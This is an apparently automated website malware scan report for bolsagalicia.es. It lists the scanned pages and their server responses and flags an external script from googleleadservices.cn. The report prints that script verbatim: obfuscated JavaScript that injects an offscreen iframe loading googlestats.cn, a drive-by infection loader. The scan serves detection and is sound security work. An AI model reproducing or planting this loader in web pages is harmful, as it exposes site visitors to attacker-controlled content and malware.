Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bolsagalicia.es
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.bolsagalicia.es/ | HTTP/1.1 303 See other Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 08 Jan 2015 16:03:45 GMT Pragma: no-cache Location: http://www.bolsagalicia.es/index.php/es/ Server: Apache Vary: Accept-Encoding Content-Length: 565 Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=l16537thrr6mpo94td71a4bhq5; path=/ Set-Cookie: 140f41ec8b5a247476e463f8864ea16f=2u53u9f0tdsn5o2h7dqdkavt41; path=/ | clean |
http://www.bolsagalicia.es/index.php/es/ | 200 OK Content-Length: 15566 Content-Type: text/html | clean |
http://googleleadservices.cn/statistics1.js | 200 OK Content-Length: 398 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://googlestats.cn/default.html'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dr11938\'></div>'); document.getElementById('__dr11938').appendChild(_q); Antivirus reports:
| ||
http://www.bolsagalicia.es/media/system/js/mootools-core.js | 200 OK Content-Length: 88540 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/media/system/js/core.js | 200 OK Content-Length: 4225 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/media/system/js/mootools-more.js | 200 OK Content-Length: 238128 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/templates/siteground-j16-8/js/CreateHTML5Elements.js | 200 OK Content-Length: 332 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/templates/siteground-j16-8/js/jquery-1.4.4.min.js | 200 OK Content-Length: 78600 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/templates/siteground-j16-8/js/sgmenu.js | 200 OK Content-Length: 1085 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/modules/mod_slideticker/tmpl/js/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/modules/mod_slideticker/tmpl/js/script.js | 200 OK Content-Length: 2415 Content-Type: application/javascript | clean |
http://www.bolsagalicia.es/index.php/es/bolsa-de-galicia2 | 200 OK Content-Length: 16183 Content-Type: text/html | clean |
http://www.bolsagalicia.es/index.php/es/indices-dcm | 200 OK Content-Length: 20914 Content-Type: text/html | clean |
http://www.bolsagalicia.es/index.php/es/listado-de-empresas | 200 OK Content-Length: 32876 Content-Type: text/html | clean |
http://www.bolsagalicia.es/index.php/es/boletines | 200 OK Content-Length: 40462 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bolsagalicia.es
Result:
GET / HTTP/1.1
Host: bolsagalicia.es
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bolsagalicia.es
Referer: http://www.google.com/search?q=bolsagalicia.es
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bolsagalicia.es
Referer: http://www.google.com/search?q=bolsagalicia.es
Result:
The result is similar to the first query. There are no suspicious redirects found.